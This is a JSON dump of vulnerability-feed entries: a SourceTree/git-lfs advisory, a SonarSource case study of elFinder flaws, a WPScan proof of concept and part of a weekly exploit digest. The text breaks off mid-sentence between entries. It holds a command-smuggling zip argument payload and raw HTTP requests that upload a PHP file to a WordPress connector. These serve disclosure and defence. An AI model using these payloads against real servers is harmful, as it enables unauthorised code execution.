An attacker could create a malicious repository which, after being cloned in SourceTree for Windows and enabled with git-lfs, is able to exploit this issue to gain code execution on the system.\r\n\r\n*Affected versions:*\r\n * Version\u00a03.3.9\u00a0and earlier\r\n\r\n\u00a0\r\n\r\n*Fix*\r\n * You can download the latest version of\u00a0the [standard installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourceTreeSetup-3.3.9.exe] or the [enterprise installer|https://product-downloads.atlassian.com/software/sourcetree/windows/ga/SourcetreeEnterpriseSetup_3.3.9.msi].\r\n\r\n\u00a0\r\n\r\nFor additional details, see the [full advisory|https://confluence.atlassian.com/display/SOURCETREEKB/SourceTree+for+Windows+Security+Advisory+24th+March+2021]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-07T17:07:10", "type": "atlassian", "title": "RCE via git-lfs in Sourcetree for Windows - CVE-2020-27955", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955", "CVE-2021-21237"], "modified": "2021-03-24T16:50:54", "id": "ATLASSIAN:SRCTREEWIN-13410", "href": 
"https://jira.atlassian.com/browse/SRCTREEWIN-13410", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "veracode": [{"lastseen": "2022-07-17T12:28:43", "description": "github.com/git-lfs/git-lfs is vulnerable to remote code execution. The vulnerability exists in 'ExecCommand' function of `subprocess_windows.go` which allows an attacker to inject and execute codes in the root directory of a malicious repository by simply adding an executable files. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-14T09:57:20", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-27955"], "modified": "2022-04-19T18:33:50", "id": "VERACODE:34211", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-34211/summary", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:24:58", "description": "Git LFS 2.12.0 allows Remote Code Execution.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[amurray](<https://launchpad.net/~amurray>) | Only 
Hence, we highly recommend that all users immediately upgrade elFinder to the latest version.\n\n## Technical Details\n\nelFinder comes with a back end (also called _connector_) written in PHP and a front end written in HTML and JavaScript. The _connector_ is the main script that dispatches the actions of the front end code to the right back end code to implement file system features. Connectors can be configured to disallow dangerous actions, restrict uploads to specific MIME types: two different ones are part of the default install. We detected vulnerabilities in the so-called \u201cminimal\u201d connector. It only allows image and plain text uploads and FTP is the only supported remote virtual filesystem: this is presumably the safest one and the most likely to be deployed. \n\nTo give a better understanding of the code snippets we will use to demonstrate our findings, we will first describe how elFinder\u2019s routing works. Like in many modern PHP applications, the connector (e.g. connector.minimal.php) is the only entry point. It declares configuration directives and closures and then instantiates both elFinder (the core) and elFinderConnector (the interface between elFinder and the transport channel, here HTTP). 
\n\nThe attribute elFinder::$commands contains every valid action and the expected arguments:\n\n**php/elFinder.class.php**\n \n \n protected $commands = array(\n \u00a0\u00a0'abort' => array('id' => true),\n \u00a0\u00a0'archive' => array('targets' => true, 'type' => true, 'mimes' => false, 'name' => false),\n \u00a0\u00a0'callback' => array('node' => true, 'json' => false, 'bind' => false, 'done' => false),\n \u00a0\u00a0'chmod' => array('targets' => true, 'mode' => true),\n \u00a0\u00a0'dim' => array('target' => true, 'substitute' => false),\n \u00a0\u00a0'duplicate' => array('targets' => true, 'suffix' => false),\n // [...]\n\nThe user can call any of these commands by providing the cmd parameter with the required command parameter via PATH_INFO, GET, or POST. In each command handler, parameters are accessed using $args.\n\nTo allow remote filesystems (FTP, Dropbox, etc.) to be used with local ones, elFinder implements a filesystem abstraction layer (elFinderVolumeDriver) on top of which all drivers are built. Files are then referenced by their volume name (e.g. t1_ is the trash, l1_ the default local volume) and the URL-safe Base64 of their name. \n\nLet\u2019s first dig into an arbitrary file deletion bug chain, composed of two distinct issues.\n\n### Deleting Arbitrary Files\n\nThe PHP core does not provide an effective way to run background threads, or perform synchronization and inter-process communication. elFinder tries to balance this by heavily using temporary files and post-request hooks. For instance, users can abort ongoing actions by calling the method of the same name:\n\n**php/elFinder.class.php**\n \n \n protected function abort($args = array())\n {\n if (!elFinder::$connectionFlagsPath || $_SERVER['REQUEST_METHOD'] === 'HEAD') {\n return;\n }\n \n $flagFile = elFinder::$connectionFlagsPath . DIRECTORY_SEPARATOR . 
'elfreq%s';\n if (!empty($args['makeFile'])) { \n self::$abortCheckFile = sprintf($flagFile, $args['makeFile']); // <-- [1]\n touch(self::$abortCheckFile);\n $GLOBALS['elFinderTempFiles'][self::$abortCheckFile] = true;\n return;\n }\n \n $file = !empty($args['id']) ? sprintf($flagFile, $args['id']) : self::$abortCheckFile; // <-- [2]\n $file && is_file($file) && unlink($file);\n }\n\nHere, a code vulnerability is present at [1] and [2]: a user-controlled parameter is concatenated into a full path without prior checks. For [1], it can end up creating an empty file with a fully controllable name, and in [2] it can be used to remove an arbitrary file. SonarCloud issues for both bugs are available: [[1]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi3&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>) and [[2]](<https://sonarcloud.io/project/issues?id=SonarSourceResearch_elFinder2&open=AXhbTmQAMtwvSXpgjgi1&resolved=false&sonarsourceSecurity=path-traversal-injection&types=VULNERABILITY>).\n\nThere is a catch: the filename resulting from [1] will be prefixed by elfreq. In a path traversal attack, POSIX systems will fail path resolution if any predecessor in the path does not exist or is not a directory. For instance, resolving /tmp/i_do_not_exist/../ or /tmp/i_am_a_file/../ will respectively fail with ENOENT and ENOTDIR. This prerequisite makes the exploitation of these two vulnerabilities impossible as-is, and will require another bug, such as the ability to create an arbitrary directory.\n\nAn attacker could then look into the command mkdir and discover a primitive that allows this exact behaviour. 
Here is its top-level handler, before it goes through the filesystem abstraction layer:\n\n**php/elFinder.class.php**\n \n \n function mkdir($args)\n {\n $target = $args['target'];\n $name = $args['name'];\n $dirs = $args['dirs'];\n // [...]\n if (($volume = $this->volume($target)) == false) {\n return array('error' => $this->error(self::ERROR_MKDIR, $name, self::ERROR_TRGDIR_NOT_FOUND, '#' . $target));\n }\n // [...]\n return ($dir = $volume->mkdir($target, $name)) == false\n ? array('error' => $this->error(self::ERROR_MKDIR, $name, $volume->error()))\n : array('added' => array($dir));\n }\n }\n\nA generic implementation is present in elFinderVolumeDriver to handle both the volume and path that should be created. It will call the volume-specific implementation at [1] with the volume absolute path on the filesystem as the first parameter and the target name as the second parameter: \n\n**php/elFinderVolumeDriver.class.php**\n \n \n public function mkdir($dsthash, $name)\n {\n // [...]\n $path = $this->decode($dsthash);\n // [...]\n $dst = $this->joinPathCE($path, $name);\n // v--- [1]\n $mkpath = $this->convEncOut($this->_mkdir($this->convEncIn($path), $this->convEncIn($name)));\n if ($mkpath) {\n $this->clearstatcache();\n $this->updateSubdirsCache($path, true);\n $this->updateSubdirsCache($mkpath, false);\n }\n \n return $mkpath ? $this->stat($mkpath) : false;\n }\n\nIt is defined as follows:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _joinPath($dir, $name)\n {\n return rtrim($dir, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR . $name;\n }\n \n protected function _mkdir($path, $name)\n {\n $path = $this->_joinPath($path, $name);\n \n if (mkdir($path)) {\n chmod($path, $this->options['dirMode']);\n return $path;\n }\n \n return false;\n }\n\nelFinderVolumeLocalFileSystem::_joinPath() is doing a mere concatenation of the two values, leading to a path traversal vulnerability. 
This gives a primitive to create arbitrary, empty folders on the local filesystem. While not being a vulnerability in itself, it will allow the exploitation of the aforementioned behaviour. \n\nIt is also worth noting the presence of a full path disclosure in the rm command, disclosing the absolute path of a given file on the local filesystem:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n protected function remove($path, $force = false)\n {\n $stat = $this->stat($path);\n \n if (empty($stat)) {\n return $this->setError(elFinder::ERROR_RM, $path, elFinder::ERROR_FILE_NOT_FOUND);\n }\n\nThe impact of this vulnerability is quite dependent on the environment: it could be chained with other elFinder bugs, used to trigger interesting behaviors in other applications (e.g. [remove WordPress\u2019 wp-config.php file to gain code execution](<https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>)) or used to affect existing security measures (e.g. removing .htaccess files).\n\nThis vulnerability has been [fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) by improving the implementation of elFinderVolumeLocalFileSystem::_joinPath() to assert that the final path won\u2019t be outside of the base one. Several calls to basename() across the codebase were also added as a hardening measure.\n\n### Moving Arbitrary Files\n\nThis same elFinderVolumeLocalFileSystem::_joinPath() method is used in other actions, such as rename: it combines a volume base directory and a user-provided destination name. It is thus vulnerable to the bug we just described. 
\n\nThe following snippet is the actual implementation of elFinderVolumeLocalFileSystem::rename(), after executing all the code responsible for decoding the paths and ensuring that the destination extension is allowed:\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _move($source, $targetDir, $name)\n {\n $mtime = filemtime($source);\n $target = $this->_joinPath($targetDir, $name);\n if ($ret = rename($source, $target) ? $target : false) {\n isset($this->options['keepTimestamp']['move']) && $mtime && touch($target, $mtime);\n }\n return $ret;\n }\n\nWhile the destination extension is still strictly limited by MIME checks, this primitive can be enough for an unauthenticated attacker to gain command execution on the server, depending on the environment, by overriding files like authorized_keys, composer.json, etc. This bug [has been fixed](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L347-R369>) with the same patch as the previous bug we discussed.\n\n### Uploading PHP Files\n\nAs for most PHP applications, the biggest threat faced by elFinder is that an attacker could be able to upload PHP scripts to the server, since nothing (except quite a hardened web server configuration) would prevent them from accessing it directly to execute its contents. 
The maintainers initially tried to defend against that by crafting a block-list that associated dangerous MIME types to the relevant extensions:\n\n**php/elFinderVolumeDriver.class.php**\n \n \n 'staticMineMap' => array(\n 'php:*' => 'text/x-php',\n 'pht:*' => 'text/x-php',\n 'php3:*' => 'text/x-php',\n 'php4:*' => 'text/x-php',\n 'php5:*' => 'text/x-php',\n 'php7:*' => 'text/x-php',\n 'phtml:*' => 'text/x-php',\n // [...]\n\nIn our test environment (Apache HTTP 2.4.46-1ubuntu1 on Ubuntu 20.10), the default configuration declares that .phar files should be treated as application/x-httpd-php ([1]) and be interpreted:\n \n \n $ cat /etc/apache2/mods-available/php7.4.conf\n <FilesMatch \".+\\.ph(ar|p|tml)$\"> \n SetHandler application/x-httpd-php # <-- [1]\n </FilesMatch> \n <FilesMatch \".+\\.phps$\">\n SetHandler application/x-httpd-php-source\n # Deny access to raw php sources by default\n # To re-enable it's recommended to enable access to the files\n # only in specific virtual host or directory\n Require all denied\n </FilesMatch>\n # Deny access to files without filename (e.g. '.php')\n <FilesMatch \"^\\.ph(ar|p|ps|tml)$\">\n Require all denied\n </FilesMatch>\n // [...]\n\nThis configuration was also observed on Debian\u2019s stable release. While another pass of MIME type detection is performed on the contents of the file, this can be easily circumvented as the PHP interpreter allows statements anywhere in the interpreted files (e.g. <?php can be placed after some dummy data).\n\nThe [fix](<https://github.com/Studio-42/elFinder/commit/75ea92decc16a5daf7f618f85dc621d1b534b5e1>) is straightforward: it declares that .phar files are associated with the MIME text/x-php, which are disallowed by default. \n\n### Argument Injection\n\nAmong the default features that make elFinder so powerful, users can select multiple files and archive them using external tools such as zip, rar, and 7z. 
This functionality is exposed under the action named archive:\n\n**php/elFinder.class.php**\n \n \n public function archive($args)\n {\n $targets = isset($args['targets']) && is_array($args['targets']) ? $args['targets'] : array();\n $name = isset($args['name']) ? $args['name'] : '';\n \n if (($volume = $this->volume($targets[0])) == false) {\n return $this->error(self::ERROR_ARCHIVE, self::ERROR_TRGDIR_NOT_FOUND);\n }\n \n foreach ($targets as $target) {\n $this->itemLock($target);\n }\n \n return ($file = $volume->archive($targets, $args['type'], $name))\n ? array('added' => array($file))\n : array('error' => $this->error(self::ERROR_ARCHIVE, $volume->error()));\n }\n\nNote that users can create archives even if their upload is forbidden, by calling the archive command on existing files. The implementation is specific to the virtual filesystem in use. We will focus solely on the default one, since it is inherited by elFinderVolumeLocalFileSystem which crafts the full command line ([1]) and executes it with the default shell ([2]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function makeArchive($dir, $files, $name, $arc)\n {\n // [...]\n $cwd = getcwd();\n if (chdir($dir)) {\n foreach ($files as $i => $file) {\n $files[$i] = '.' . DIRECTORY_SEPARATOR . basename($file);\n }\n $files = array_map('escapeshellarg', $files);\n \n $cmd = $arc['cmd'] . ' ' . $arc['argc'] . ' ' . escapeshellarg($name) . ' ' . implode(' ', $files); // <-- [1]\n $this->procExec($cmd, $o, $c); // <-- [2]\n // [...]\n\nHere, the value of $name comes from the user-controlled parameter $_GET['name']. While properly escaped with escapeshellarg() to prevent the use of command substitution sequences, the program will try to parse this value as a flag (\\--foo=bar) and then as a positional argument. 
It is also worth noting that the user's value is suffixed with .zip in the case in which the ZIP archiver is selected.\n\nThe command zip implements an integrity test feature (-T) that can be used along with -TT to specify the test command to run. In the present case, it gives the attacker a way to execute arbitrary commands using this parameter injection.\n\nTo be able to exploit this vulnerability, the attacker needs to create a dummy file (e.g. a.txt), archive it to create a.zip and then invoke the archive action with both the original file and the archive as targets, using a name like -TmTT="$(id>out.txt)foooo".\n\nThe resulting command line will be zip -r9 -q '-TmTT="$(id>out.txt)foooo".zip' './a.zip' './a.txt', thus executing id and logging its standard output into out.txt \u2014 this file will be available with the other documents in elFinder\u2019s interface.\n\nWhen it came time to fix this bug, zip wasn't very friendly. The usual method based on POSIX\u2019s \\-- ([see our previous article about a parameter injection in Composer for an in-depth explanation](<https://blog.sonasource.com/php-supply-chain-attack-on-composer>)) can\u2019t be applied here, since zip will exit with the following error:\n \n \n zip error: Invalid command arguments (can't use -- before archive name)\n\nThe maintainers then [decided to prefix the archive name with ./ to prevent any risk of parameter injection](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-85602823cf2cdaf2502dc4f1b97001ffc0f083652aef175d9f068a5bfe90ca71L6875-R6882>). They also decided to harden the calls to the other archivers (7z, rar, etc.) in the same patch. \n\n### Quarantine and Race Condition\n\nLet\u2019s have a look at our last finding of this case study. 
While this vulnerability in the quarantine feature cannot be exploited in the default configuration since archives can\u2019t be uploaded; the feature could have been responsible for future security issues because of its design. \n\nThe rationale behind the quarantine is that archives may contain unwanted files (mostly PHP scripts) that should not be extracted in the current folder without first running security checks (e.g. with MIME validation). So instead, elFinder chose to extract archives into a folder named .quarantine, placed under the files/ folder, and elFinderVolumeLocalFileSystem::_extract() generates a random directory name for each archive extraction (at [1]):\n\n**php/elFinderVolumeLocalFileSystem.class.php**\n \n \n protected function _extract($path, $arc)\n {\n if ($this->quarantine) {\n $dir = $this->quarantine . DIRECTORY_SEPARATOR . md5(basename($path) . mt_rand()); // <-- [1]\n $archive = (isset($arc['toSpec']) || $arc['cmd'] === 'phpfunction') ? '' : $dir . DIRECTORY_SEPARATOR . 
basename($path);\n // [...]\n\nThis can be confirmed dynamically thanks to strace or the inotify suite, for instance here with an archive containing a PHP file:\n \n \n $ inotifywait -m -r .\n ./ CREATE,ISDIR efbf975ccbac8727f434574610a0f1b6\n ./ OPEN,ISDIR efbf975ccbac8727f434574610a0f1b6\n ]...[\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB,ISDIR\n ./efbf975ccbac8727f434574610a0f1b6/ CREATE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ OPEN win.php\n ./efbf975ccbac8727f434574610a0f1b6/ MODIFY win.php\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB win.php\n ./efbf975ccbac8727f434574610a0f1b6/ CLOSE_WRITE,CLOSE win.php\n ./efbf975ccbac8727f434574610a0f1b6/ ATTRIB win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE win.php\n [...]\n ./efbf975ccbac8727f434574610a0f1b6/ DELETE_SELF\n\nThis trace can be understood as:\n\n * A folder named efbf975ccbac8727f434574610a0f1b6 is created,\n * A file named win.php is created within efbf975ccbac8727f434574610a0f1b6,\n * Data is written into win.php,\n * win.php is deleted,\n * efbf975ccbac8727f434574610a0f1b6 is deleted.\n\nIf the server is configured to list directories, this behavior can easily be exploited, since dangerous files (e.g. .php) can be accessed right before the MIME validation step and their removal. The race condition window is however too small to think of an attack involving brute force if the random directory name can\u2019t be found that way. \n\nAn attacker could discover that the duplicate action can be used on the internal folders, like .quarantine, and copy any file regardless of its contents. While being a harmless functional bug on its own, it can be chained with the quarantine feature to duplicate the folder containing our extracted archive just before its deletion. 
The duplicated folder is then visible in the interface, and allows an attacker to get around the random name to access the malicious script, ultimately granting arbitrary code execution.\n\nAs a [fix](<https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17#diff-6fe96d285bdbb6d8cf10335a4684ceb4f8badaa6bb7190a4f6b0d960d1af8904L78-R232\\)>), the maintainers decided to move the .quarantine folder outside of files/. The elFinderVolumeLocalFileSystem abstraction layer is not aware of anything outside of this folder, preventing any unintended action on .quarantine.\n\n## Timeline\n\n<table class="table table-striped"><thead><tr><th>Date</th><th>Action</th></tr></thead><tbody><tr><td>2021-03-22</td><td>These 5 issues are reported to maintainers</td></tr><tr><td>2021-06-10</td><td>The maintainers acknowledge all our findings</td></tr><tr><td>2021-06-13</td><td>elFinder 2.1.59 is released, fixing the bugs we reported</td></tr><tr><td>2021-06-13</td><td>CVE-2021-32682 and CVE-2021-23394 are assigned</td></tr></tbody></table>\n\n## Summary\n\nIn this case study we looked at critical code vulnerabilities that are commonly found in web file managers. We presented several of our real-world findings in the latest version of elFinder available at the time, including their potential impact and how they were fixed by the vendor. It allowed us to demonstrate that innocuous bugs can often be combined to gain arbitrary code execution. We believe it is important to document and report these vulnerabilities to break future bug chains and reduce the risk of similar issues.\n\nWe also learned that working with paths is not easy and that extra measures should be taken: performing additional checks in the \u201clow-level\u201d functions, using basename() and dirname() with confidence (and knowing their limits!) and always validating user-controlled data. 
Such bugs are very common in web file managers, and you should always have such bugs in mind when working with them.\n\nWhile we don\u2019t plan to release any exploits for these bugs, we would still like to bring your attention to the fact that arbitrary code execution was easily demonstrated and attackers won\u2019t have much trouble replicating it. We urge you to immediately upgrade to elFinder 2.1.59. We also advise enforcing strong access control on the connector (e.g. basic access authentication). \n\nFinally, we would like to thank the maintainers of elFinder for acknowledging our advisory and fixing these vulnerabilities in a timely and professional manner.\n\n## Related Blog Posts\n\n * <https://blog.sonarsource.com/php-supply-chain-attack-on-composer>\n * <https://blog.sonarsource.com/bitbucket-path-traversal-to-rce>\n * <https://blog.sonarsource.com/wordpress-file-delete-to-code-execution>", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-17T00:00:00", "type": "sonarsource", "title": "elFinder - A Case Study of Web File Manager Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, 
"cvelist": ["CVE-2021-23394", "CVE-2021-32682"], "modified": "2021-08-17T00:00:00", "id": "SONARSOURCE:82C920BF6FA095A2CE2867D1EBDCCC6E", "href": "https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2022-04-15T14:18:16", "description": "The plugin is using an outdated version of the elFinder library, which is known to be affected by security issues (CVE-2021-32682), and does not have any authorisation or CSRF checks in its connector AJAX action, allowing any authenticated user, such as a subscriber, to call it. Furthermore, as the options passed to the elFinder library do not restrict any file type, users with a role as low as subscriber can Create/Upload/Delete Arbitrary files and folders.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-14T00:00:00", "type": "wpexploit", "title": " Library File Manager < 5.2.3 - Subscriber+ Arbitrary File Creation/Upload/Deletion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-32682", "CVE-2022-0403"], 
"modified": "2022-04-11T07:40:39", "id": "WPEX-ID:997A7FBF-98C6-453E-AD84-75C1E91D5A1E", "href": "", "sourceData": "Create an empty file to /aa.txt:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\r\nX-Requested-With: XMLHttpRequest\r\nContent-Length: 53\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\naction=connector&cmd=mkfile&name=aa.txt&target=l1_Lw\r\n\r\nUpload a PHP file to /hello.php:\r\n\r\nPOST /wp-admin/admin-ajax.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-GB,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: multipart/form-data; boundary=---------------------------14077557643203747161684872583\r\nContent-Length: 597\r\nConnection: close\r\nCookie: [any authenticated user]\r\n\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"cmd\"\r\n\r\nupload\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"target\"\r\n\r\nl1_Lw\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nconnector\r\n-----------------------------14077557643203747161684872583\r\nContent-Disposition: form-data; name=\"upload[]\"; filename=\"hello.php\"\r\nContent-Type: text/plain\r\n\r\n<?php echo 'failed'; ?>\r\n\r\n-----------------------------14077557643203747161684872583--\r\n\r\n\r\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "wallarmlab": [{"lastseen": "2021-08-19T16:35:42", "description": "Welcome to the Wallarm weekly web exploits digest! Starting this week, we will publish weekly digests consisting of web exploits with CVSS scores higher than 5, followed by explanations, risk analysis, related stories and news. So, here we go! 
\n\n**The most sophisticated and interesting exploit** fell outside this score range for some reason, but who are we to argue with a CVSS score? This is the Apache OFBiz XML-RPC Java Serialization Remote Code Execution issue <https://vulners.com/packetstorm/PACKETSTORM:161769>, where you can find an XML-packed and Base64-encoded Java deserialization payload:\n \n \n <name>#{rand_text_alphanumeric(8..42)}</name> \n <value> \n <serializable xmlns=\"http://ws.apache.org/xmlrpc/namespaces/extensions\">#{Rex::Text.encode_base64(data)}</serializable> \n </value> \n\nIn a nutshell, this bypasses WAFs, IPS/IDS and NGFW systems by default, since the malicious payload can actually be encoded twice: first with Base64 and then with XML encodings such as built-in or defined entities. \n\n**The most dangerous exploit released last week** was definitely a VMware vCenter RCE. \n\nIn general, last week's harvest of exploits for vulnerabilities scored CVSS 5+ breaks down by type as follows:\n\nType| # \n---|--- \nFile upload| 2 \nPHP Object Injection| 2 \nSQL Injection| 2 \nBuffer overflow| 1 \nXSS| 1 \nSSRF| 1 \nDeserialization| 1 \nEnumeration| 1 \n\nThe week of March 8th - 15th web exploits stats, CVSS >5\n\nSo, the hackers' arsenal was reinforced between 2021-03-08 and 2021-03-15 with exploitation tools for the following software:\n\n * **VMware vCenter Server** - This one is the winner of the week with a severity score of 10\n * **QCubed 3.1.1** - Three high-severity exploits arrived for this product\n * **Golden FTP Server 4.70**\n * **HPE Systems Insight Manager**\n * **Joomla JCK Editor**\n * **SonLogger 4.2.3.3**\n * **Microsoft Exchange 2019**\n * **ForkCMS**\n * **Atlassian JIRA**\n\nHere is the list of the high-scored reinforcements and a short brief on the headliners\u2019 mechanics:\n\n* * *\n\n2021-03-08 \n**[VMware vCenter Server File Upload / Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161695>) \nScore: CVSS 10 \nType: File 
upload \nMetasploit + \n[CVE-2021-21972](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21972>)**\n\nThis new high-scored RCE Metasploit module exploits an unauthenticated OVA file upload and a path traversal vulnerability in VMware vCenter Server. It writes a JSP payload to a web-accessible directory, and vulnerable Linux versions aren\u2019t exploitable via a web shell. Writing an SSH public key to authorized_keys works okay, but due to the user\u2019s non-existent password expiration 90 days after install, this technique is quite useless when applied in a production environment. Nevertheless, it works well with Windows appliances and older Linux versions. \n**Extra: \n[Why WAFs can\u2019t catch VMware CVE-2021-21972](<https://vulners.com/wallarmlab/WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0>)**\n\n* * *\n\n2021-03-09 \n**[Golden FTP Server 4.70 Buffer Overflow](<https://vulners.com/packetstorm/PACKETSTORM:161711>) \n[CVE-2006-6576](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6576>) \nScore: CVSS 7.5 \nType: Buffer overflow**\n\nA buffer overflow exists in the GoldenFTP authentication procedure. Note that the source IP address of the user performing the authentication forms part of the buffer and, as such, must be accounted for when calculating the appropriate offset. 
It should also be noted that the exploit is somewhat unstable, and if exploitation fails, GoldenFTP will be left in a state where it will still accept connections, but it will be unable to handle or process them in any way, so be careful.\n\n* * *\n\n2021-03-09 \n**[HPE Systems Insight Manager AMF Deserialization Remote Code Execution](<https://vulners.com/packetstorm/PACKETSTORM:161721>) \nCVSS 7.5 \n[CVE-2020-7200](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2020-7200>) \nType: Deserialization**\n\nA remotely exploitable vulnerability exists within HPE System Insight Manager (SIM) version 7.6.x that can be leveraged remotely by an unauthenticated attacker to execute code within the context of HPE System Insight Manager\u2019s hpsimsvc.exe process, which runs with administrative privileges. The vulnerability occurs due to a failure to validate data during the deserialization process when a user submits a POST request to the /simsearch/messagebroker/amfsecure page. The module exploits this vulnerability by leveraging an outdated copy of Commons Collection, namely 3.2.2, that ships with HPE SIM to gain RCE as the administrative user running HPE SIM.\n\n* * 